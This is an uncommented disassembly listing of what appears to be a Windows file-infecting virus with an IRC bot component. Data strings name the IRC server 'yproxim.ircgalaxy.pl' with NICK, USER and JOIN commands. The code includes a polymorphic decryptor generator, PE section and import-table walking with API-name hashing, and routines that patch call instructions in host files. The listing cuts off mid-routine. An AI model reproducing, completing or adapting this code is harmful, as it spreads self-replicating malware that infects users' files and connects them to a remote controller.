aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',0
aTargethost db 'TargetHost',0
dw 2
db 0FFh
db 0F0h, 73h, 7Eh
db 2
aYproxim_ircgal db 'yproxim.ircgalaxy.pl',0
aNickThychzvrUs db 'NICK thychzvr',0Ah
db 'USER q020501 . . :-JOIN &virtu',0Ah
db 'Uè',0
align 4
dd 0ED815D00h, 401DB4h, 157785C6h, 0FF000040h, 40359495h
dd 1FE8C100h, 1E6A3C74h, 3550B58Bh, 0AC590040h, 2A752E3Ch
dd 0FF3E8166h, 8D23751Dh, 403640BDh, 2768B00h, 0A566A557h
dd 336A858Dh, 858F0040h, 403390h, 0FA4689FAh, 0FBFE4E8Ch
dd 0CFE201B1h, 858D43EBh, 4015B1h, 6A006A50h, 0A495FF0Eh
dd 83004035h, 408247Ch, 4E82B75h, 53000000h, 0FF004346h
dd 40358895h, 0FC48E800h, 7E8FFFFh, 53000000h, 4F5F4346h
dd 95FF0053h, 403588h, 0FFFC31E8h, 0F356E8FFh, 8DFFFFFFh
dd 401303h, 0BE8h, 45535500h, 2E323352h, 4C4C44h, 359C95FFh
dd 0AE80040h, 77000000h, 69727073h, 4166746Eh, 95FF5000h
dd 403548h, 35548589h, 310F0040h, 18E08D8Dh, 85890040h
dd 403646h, 9C95FF51h, 93004035h, 468h, 0EDB58D00h, 59004018h
dd 362CBD8Dh, 0D6E80040h, 66FFFFF6h, 1D6785C7h, 0F0FF0040h
dd 1D69A583h, 8D000040h, 401D2795h, 6A545000h, 52006A01h
dd 268h, 3095FF80h, 85004036h, 22755AC0h, 1D5A8D8Dh, 6A520040h
dd 67B58D06h, 5400401Dh, 51505056h, 3495FF52h, 58004036h
dd 362C95FFh, 85C60040h, 40384Dh, 0CE800h, 53570000h, 334B434Fh
dd 4C442E32h, 95FF004Ch, 40359Ch, 76893h, 0B58D0000h, 401844h
dd 0FCBD8D59h, 0E8004035h, 0FFFFF651h, 0CE8h, 4E495700h
dd 54454E49h, 4C4C442Eh, 9C95FF00h, 85004035h, 0E7840FC0h
dd 93000001h, 568h, 82B58D00h, 59004018h, 3618BD8Dh, 1AE80040h
dd 83FFFFF6h, 40361CBDh, 840F0000h, 1C2h, 190EC81h, 68540000h
dd 101h, 35FC95FFh, 0C4810040h, 190h, 6AD48B50h, 95FF5200h
dd 40361Ch, 7559C085h, 1388680Dh, 95FF0000h, 4035BCh, 0BD83E2EBh
dd 401D69h, 8D297500h, 401D6D85h, 95FF5000h, 403608h, 840FC085h
dd 13Bh, 8B0C408Bh, 8F30FF00h, 401D6985h, 4D85C600h, 1004038h
dd 16A006Ah, 95FF026Ah, 403614h, 0FFFF883h, 11284h, 958D9300h
dd 401D65h, 5352106Ah, 360495FFh, 0C0850040h, 0F2850Fh
dd 0BD8D0000h, 401D86h, 0BCE808B1h, 68FFFFFAh, 94h, 89E62B5Eh
dd 0FF542434h, 40359895h, 94BD8D00h, 0B100401Dh, 0FA9DE801h
dd 448BFFFFh, 0E0C11024h, 24440B08h, 8E0C104h, 824440Bh
dd 5E850h, 2E250000h, 57007836h, 355495FFh, 0C4830040h
dd 647C60Ch, 81958D20h, 6A00401Dh, 216800h, 53520000h
dd 361095FFh, 7C8D0040h, 0FF571424h, 40355895h, 3804C600h
dd 6A400Ah, 0FF535750h, 40361095h, 8DE60300h, 401DA2BDh
dd 68006A00h, 0Ch, 95FF5357h, 403610h, 0C3Dh, 8D4D7500h
dd 40364EB5h, 4D8D8D00h, 2B004038h, 51006ACEh, 95FF5356h
dd 40360Ch, 7E00F883h, 0FE8B912Fh, 364EB58Dh, 0DB00040h
dd 1075AEF2h, 0FAF8E860h, 7261FFFFh, 8D09E317h, 0EAEB0177h
dd 0CE2BCF8Bh, 364EBD8Dh, 0A4F30040h, 0B9EBF787h, 95FF53h
dd 80004036h, 401577BDh, 2A740100h, 753068h, 0BC95FF00h
dd 80004035h, 40384DBDh, 11740000h, 1D6985C7h, 40h, 85C60000h
dd 40384Dh, 0FE56E900h, 85C7FFFFh, 401580h, 80000000h
dd 4C25Dh, 204F0A0Dh, 6E6F6F6Eh, 20666F20h, 6566696Ch
dd 204F2021h, 656D6974h, 206F7420h, 656C6563h, 74617262h
dd 0A0D2165h, 20202020h, 73204F20h, 656D6D75h, 61672072h
dd 6E656472h, 520A0D21h, 6E656C65h, 73656C74h, 20796C73h
dd 70706168h, 6E612079h, 78652064h, 74636570h, 2C746E61h
dd 61747320h, 6E69646Eh, 2D203A67h, 61570A0Dh, 69686374h
dd 6120676Eh, 64206C6Ch, 61207961h, 6E20646Eh, 74686769h
dd 6F66202Ch, 72662072h, 646E6569h, 20492073h, 74696177h
dd 570A0D3Ah, 65726568h, 65726120h, 756F7920h, 7266202Ch
dd 646E6569h, 43203F73h, 21656D6Fh, 20744920h, 74207369h
dd 21656D69h, 27744920h, 616C2073h, 0D216574h, 0C784040Ah
dd 0A6141330h, 0A6142910h, 0B1FAE510h, 73C17E27h, 0D479ED1Ah
dd 3752484Fh, 0AB595740h, 99AD473Ah, 6CCC5C62h, 0B8B352C2h
dd 6EF96AD8h, 60h, 13h dup(0)
db 0
; =============== S U B R O U T I N E =======================================
sub_3142952D proc near ; CODE XREF: sub_31429574:loc_314295D1�p
; sub_31429634+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_31429549: ; CODE XREF: sub_3142952D+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_3142956B
cmp eax, [edx+8]
jnb short loc_3142956B
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_31429570
; ---------------------------------------------------------------------------
loc_3142956B: ; CODE XREF: sub_3142952D+23�j
; sub_3142952D+28�j
add edx, 28h
loop loc_31429549
loc_31429570: ; CODE XREF: sub_3142952D+3C�j
popa
retn 4
sub_3142952D endp
; =============== S U B R O U T I N E =======================================
sub_31429574 proc near ; CODE XREF: UPX2:314298A0�p
; UPX2:314298C6�p
mov [ebp+4022F7h], al
call sub_314295E3
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_3142958B: ; CODE XREF: sub_31429574+1E�j
cmp [eax], ebx
jz short loc_3142959B
add eax, 4
loop loc_3142958B
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_3142959B: ; CODE XREF: sub_31429574+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_314295B5
loc_314295A5: ; CODE XREF: sub_31429574+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_314295A5
mov [ebp+402224h], ebx
loc_314295B5: ; CODE XREF: sub_31429574+2F�j
; sub_314295E3+34�j
cmp dword ptr [edx], 0
jz short loc_314295BF
sub esi, [edx]
add esi, [edx+10h]
loc_314295BF: ; CODE XREF: sub_31429574+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_314295CE
push dword ptr [edx]
jmp short loc_314295D1
; ---------------------------------------------------------------------------
loc_314295CE: ; CODE XREF: sub_31429574+54�j
push dword ptr [edx+10h]
loc_314295D1: ; CODE XREF: sub_31429574+58�j
call sub_3142952D
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_31429574 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_314295E3 proc near ; CODE XREF: sub_31429574+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_31429634
mov eax, [ebp+40398Eh]
call sub_31428D78
call sub_31429620
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_31429619
mov [ebp+4022A0h], ebx
jmp short loc_314295B5
; ---------------------------------------------------------------------------
loc_31429619: ; CODE XREF: sub_314295E3+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_314295E3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31429620 proc near ; CODE XREF: sub_314295E3+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_31429634
xor ecx, ecx
retn
sub_31429620 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31429634 proc near ; CODE XREF: sub_314295E3+10�p
; sub_31429620+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_3142952D
add edx, [ebp+4039AAh]
add edx, esi
loc_31429648: ; CODE XREF: sub_31429634+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_31429759
cmp dword ptr [edx+10h], 0
jz locret_31429759
mov eax, [edx+0Ch]
push eax
call sub_3142952D
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_3142966E: ; CODE XREF: sub_31429634+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_3142968E
cmp cl, 2Eh
jz short loc_3142967D
loc_3142967A: ; CODE XREF: sub_31429634+58�j
inc eax
jmp short loc_3142966E
; ---------------------------------------------------------------------------
loc_3142967D: ; CODE XREF: sub_31429634+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_3142967A
loc_3142968E: ; CODE XREF: sub_31429634+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_31429751
cmp word ptr [eax-2], 3233h
jnz loc_31429751
push esi
cmp dword ptr [edx], 0
jnz short loc_314296B1
mov ecx, [edx+10h]
jmp short loc_314296B3
; ---------------------------------------------------------------------------
loc_314296B1: ; CODE XREF: sub_31429634+76�j
mov ecx, [edx]
loc_314296B3: ; CODE XREF: sub_31429634+7B�j
add esi, ecx
push ecx
call sub_3142952D
add esi, [ebp+4039AAh]
loc_314296C1: ; CODE XREF: sub_31429634+90�j
; sub_31429634+117�j
lodsd
test eax, eax
js short loc_314296C1
jz loc_31429750
push dword ptr [ebp+4039AAh]
push eax
call sub_3142952D
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_314296ED: ; CODE XREF: sub_31429634+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_31429704
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_314296ED
; ---------------------------------------------------------------------------
loc_31429704: ; CODE XREF: sub_31429634+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_3142974A
cmp ebx, 0DB6E45A8h
jz short loc_3142974A
cmp ebx, 0FFA13B59h
jz short loc_3142974A
cmp ebx, 0ACB522D6h
jz short loc_3142974A
cmp ebx, 0F358E993h
jz short loc_3142974A
cmp ebx, 0F358E97Dh
jz short loc_3142974A
cmp ebx, 0E1253F46h
jz short loc_3142974A
cmp ebx, 0E1253F30h
jz short loc_3142974A
call dword ptr [ebp+403992h]
loc_3142974A: ; CODE XREF: sub_31429634+D6�j
; sub_31429634+DE�j ...
pop ebx
jmp loc_314296C1
; ---------------------------------------------------------------------------
loc_31429750: ; CODE XREF: sub_31429634+92�j
pop esi
loc_31429751: ; CODE XREF: sub_31429634+60�j
; sub_31429634+6C�j
add edx, 14h
jmp loc_31429648
; ---------------------------------------------------------------------------
locret_31429759: ; CODE XREF: sub_31429634+18�j
; sub_31429634+22�j
retn
sub_31429634 endp
; ---------------------------------------------------------------------------
db 1
; =============== S U B R O U T I N E =======================================
sub_3142975B proc near ; CODE XREF: UPX2:31429899�p
; UPX2:314298BF�p
push 4
pop eax
call sub_31428D78
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_31428D78
add edx, 8
xchg edx, ecx
loc_31429783: ; CODE XREF: sub_3142975B:loc_314297C2�j
push 5
pop eax
call sub_31428D78
cmp dl, 3
jnb short loc_3142979B
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_314297C2
; ---------------------------------------------------------------------------
loc_3142979B: ; CODE XREF: sub_3142975B+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_314297BC
mov al, 11h
call sub_31428D78
mov eax, 1
loc_314297B0: ; CODE XREF: sub_3142975B+5D�j
test dl, dl
jz short loc_314297C1
shl eax, 1
dec dl
jmp short loc_314297B0
; ---------------------------------------------------------------------------
jmp short loc_314297C1
; ---------------------------------------------------------------------------
loc_314297BC: ; CODE XREF: sub_3142975B+47�j
mov eax, 80000000h
loc_314297C1: ; CODE XREF: sub_3142975B+57�j
; sub_3142975B+5F�j
stosd
loc_314297C2: ; CODE XREF: sub_3142975B+3E�j
loop loc_31429783
retn
sub_3142975B endp
; ---------------------------------------------------------------------------
loc_314297C5: ; CODE XREF: sub_3142A21F+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_314297DA
mov al, 60h
stosb
loc_314297DA: ; CODE XREF: UPX2:314297D5�j
test dword ptr [ebp+403431h], 1000003h
jz loc_314298E0
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0EECC439Eh
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_31429858
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_31429823
mov eax, 2E8B6467h
loc_31429823: ; CODE XREF: UPX2:3142981C�j
stosd
mov ax, 0
stosw
jz short loc_3142982F
mov al, 5Dh
stosb
loc_3142982F: ; CODE XREF: UPX2:3142982A�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_31429856
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_31429856
mov eax, 0F8ED83h
loc_31429856: ; CODE XREF: UPX2:3142983E�j
; UPX2:3142984F�j
stosd
dec edi
loc_31429858: ; CODE XREF: UPX2:3142980B�j
test dword ptr [ebp+403431h], 3
jz short loc_31429868
mov al, 0E9h
stosb
stosd
loc_31429868: ; CODE XREF: UPX2:31429862�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_314298E0
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_3142975B
mov al, 20h
call sub_31429574
jecxz short loc_314298E0
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_314298D3
call sub_3142975B
mov al, 1Fh
call sub_31429574
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_314298D3: ; CODE XREF: UPX2:314298BD�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_314298E0: ; CODE XREF: UPX2:314297E4�j
; UPX2:3142987F�j ...
test dword ptr [ebp+403431h], 4
jz short loc_314298FE
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_314298FE: ; CODE XREF: UPX2:314298EA�j
test dword ptr [ebp+403431h], 8
jnz short loc_31429954
cmp byte ptr [ebp+40342Fh], 0
jz short loc_31429954
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_31429952
mov al, 49h
stosb
mov ax, 0FC75h
loc_31429952: ; CODE XREF: UPX2:31429949�j
stosw
loc_31429954: ; CODE XREF: UPX2:31429908�j
; UPX2:31429911�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_31429975
mov al, 58h
or al, [ebp+403429h]
stosb
loc_31429975: ; CODE XREF: UPX2:3142996A�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_31429988
add ah, 28h
loc_31429988: ; CODE XREF: UPX2:31429983�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_314299AC
mov al, 50h
add al, [ebp+403429h]
stosb
loc_314299AC: ; CODE XREF: UPX2:314299A1�j
test dword ptr [ebp+403431h], 80h
jnz short loc_314299C3
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_31429A00
; ---------------------------------------------------------------------------
loc_314299C3: ; CODE XREF: UPX2:314299B6�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_314299D5
mov al, 29h
loc_314299D5: ; CODE XREF: UPX2:314299D1�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_314299F8
mov ah, 0C8h
loc_314299F8: ; CODE XREF: UPX2:314299F4�j
or ah, [ebp+40342Ah]
stosw
loc_31429A00: ; CODE XREF: UPX2:314299C1�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_31429A84
test dword ptr [ebp+403431h], 400h
jnz short loc_31429A2F
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_31429A7C
; ---------------------------------------------------------------------------
loc_31429A2F: ; CODE XREF: UPX2:31429A22�j
test dword ptr [ebp+403431h], 800h
jnz short loc_31429A4C
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_31429A61
; ---------------------------------------------------------------------------
loc_31429A4C: ; CODE XREF: UPX2:31429A39�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_31429A61: ; CODE XREF: UPX2:31429A4A�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_31429A74
add ah, 8
loc_31429A74: ; CODE XREF: UPX2:31429A6F�j
or ah, [ebp+40342Bh]
stosw
loc_31429A7C: ; CODE XREF: UPX2:31429A2D�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_31429A84: ; CODE XREF: UPX2:31429A16�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_31429A99
mov al, 50h
add al, [ebp+403429h]
stosb
loc_31429A99: ; CODE XREF: UPX2:31429A8E�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_31429AA9
add al, 4
loc_31429AA9: ; CODE XREF: UPX2:31429AA5�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_31429AC6
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31429AC6: ; CODE XREF: UPX2:31429ABD�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_31429AD8
mov ah, 29h
loc_31429AD8: ; CODE XREF: UPX2:31429AD4�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_31429AF6
mov al, 86h
loc_31429AF6: ; CODE XREF: UPX2:31429AF2�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_31429B0A
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31429B0A: ; CODE XREF: UPX2:31429B01�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_31429B21
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_31429B30
; ---------------------------------------------------------------------------
loc_31429B21: ; CODE XREF: UPX2:31429B14�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_31429B30: ; CODE XREF: UPX2:31429B1F�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_31429B6B
test dword ptr [ebp+403431h], 40000h
jnz short loc_31429B62
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_31429B6A
; ---------------------------------------------------------------------------
loc_31429B62: ; CODE XREF: UPX2:31429B46�j
mov al, 40h
or al, [ebp+40342Bh]
loc_31429B6A: ; CODE XREF: UPX2:31429B60�j
stosb
loc_31429B6B: ; CODE XREF: UPX2:31429B3A�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_31429B87
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_31429B8F
; ---------------------------------------------------------------------------
loc_31429B87: ; CODE XREF: UPX2:31429B75�j
mov al, 48h
or al, [ebp+40342Ah]
loc_31429B8F: ; CODE XREF: UPX2:31429B85�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_31429BC3
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_31429BDE
mov cl, 77h
jmp short loc_31429BDE
; ---------------------------------------------------------------------------
loc_31429BC3: ; CODE XREF: UPX2:31429B9C�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_31429BDE: ; CODE XREF: UPX2:31429BBD�j
; UPX2:31429BC1�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_31429C88
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_31429C1F
mov eax, 2E876467h
loc_31429C1F: ; CODE XREF: UPX2:31429C18�j
stosd
mov eax, 0
stosw
jnz short loc_31429C2F
mov ax, 0E58Bh
stosw
loc_31429C2F: ; CODE XREF: UPX2:31429C27�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_31429C85
test dword ptr [ebp+403431h], 8000000h
jz short loc_31429C77
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_31429C72
mov ax, 424h
stosw
jmp short loc_31429C85
; ---------------------------------------------------------------------------
loc_31429C72: ; CODE XREF: UPX2:31429C68�j
mov al, 8
stosb
jmp short loc_31429C85
; ---------------------------------------------------------------------------
loc_31429C77: ; CODE XREF: UPX2:31429C4F�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_31429C88
; ---------------------------------------------------------------------------
loc_31429C85: ; CODE XREF: UPX2:31429C43�j
; UPX2:31429C70�j ...
mov al, 0C9h
stosb
loc_31429C88: ; CODE XREF: UPX2:31429BFB�j
; UPX2:31429C83�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_31429CB4
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_31429CB4: ; CODE XREF: UPX2:31429C92�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_31429D1F
test dword ptr [ebp+403431h], 20000000h
jz short loc_31429CE5
loc_31429CD8: ; CODE XREF: UPX2:31429CE3�j
test edi, 3
jz short loc_31429CE5
mov al, 90h
stosb
jmp short loc_31429CD8
; ---------------------------------------------------------------------------
loc_31429CE5: ; CODE XREF: UPX2:31429CD6�j
; UPX2:31429CDE�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_31429D13
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_31429D1D
; ---------------------------------------------------------------------------
loc_31429D13: ; CODE XREF: UPX2:31429D05�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_31429D1D: ; CODE XREF: UPX2:31429D11�j
stosw
loc_31429D1F: ; CODE XREF: UPX2:31429CCA�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_31429D9E
test dword ptr [ebp+403431h], 20000000h
jz short loc_31429D44
loc_31429D37: ; CODE XREF: UPX2:31429D42�j
test edi, 3
jz short loc_31429D44
mov al, 90h
stosb
jmp short loc_31429D37
; ---------------------------------------------------------------------------
loc_31429D44: ; CODE XREF: UPX2:31429D35�j
; UPX2:31429D3D�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_31429D6D
lea eax, [ebp+403429h]
loc_31429D65: ; CODE XREF: UPX2:31429D6B�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_31429D65
loc_31429D6D: ; CODE XREF: UPX2:31429D5D�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_31429D82
mov ax, 0C031h
stosw
loc_31429D82: ; CODE XREF: UPX2:31429D7A�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_31429D9B
mov ax, 0C031h
stosw
loc_31429D9B: ; CODE XREF: UPX2:31429D93�j
mov al, 0C3h
stosb
loc_31429D9E: ; CODE XREF: UPX2:31429D29�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_31429DB6
push edi
sub edi, eax
pop eax
jmp short loc_31429DCF
; ---------------------------------------------------------------------------
loc_31429DB6: ; CODE XREF: UPX2:31429DAE�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_31429DCF: ; CODE XREF: UPX2:31429DB4�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_31429DEF
neg eax
loc_31429DEF: ; CODE XREF: UPX2:31429DEB�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_31429DF3 proc near ; CODE XREF: sub_3142A21F+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_31429FDB
call near ptr loc_31429E13+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_31429E13: ; CODE XREF: sub_31429DF3+F�p
add bh, bh
sub_31429DF3 endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_3142952D
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_3142952D
mov edi, [ebp+4039A6h]
push esi
call sub_3142952D
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_31429FDB
jz loc_31429FDB
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_31429FAC
loc_31429E8D: ; CODE XREF: sub_31429FAC+29�j
lodsb
cmp al, 0E8h
jnz loc_31429F38
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_3142952D
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_31429EBB
cmp eax, [edi+0Ch]
jnb loc_31429FD4
jmp short loc_31429EC7
; ---------------------------------------------------------------------------
loc_31429EBB: ; CODE XREF: sub_31429FAC-FE�j
cmp [ebp+4039A6h], edx
jnz loc_31429FD4
loc_31429EC7: ; CODE XREF: sub_31429FAC-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_31429FD4
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_3142952D
cmp [ebp+4039A6h], edi
jnz loc_31429FD4
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_31429FD4
cmp eax, [edi+8]
jnb loc_31429FD4
loc_31429F10: ; CODE XREF: sub_31429FAC+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_31429FEA
jmp loc_31429FD4
; ---------------------------------------------------------------------------
loc_31429F38: ; CODE XREF: sub_31429FAC-11C�j
cmp al, 0FFh
jnz loc_31429FD4
cmp byte ptr [esi], 15h
jnz loc_31429FD4
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_3142952D
cmp [ebp+4039A6h], edi
jnz short loc_31429FD4
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_31429F81
cmp eax, [ebp+4039C6h]
jb short loc_31429FEA
loc_31429F81: ; CODE XREF: sub_31429FAC-35�j
cmp eax, 70000000h
jb short loc_31429FBF
call sub_31429FAC
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_31429FAB
add esp, 10h
push dword ptr [ecx]
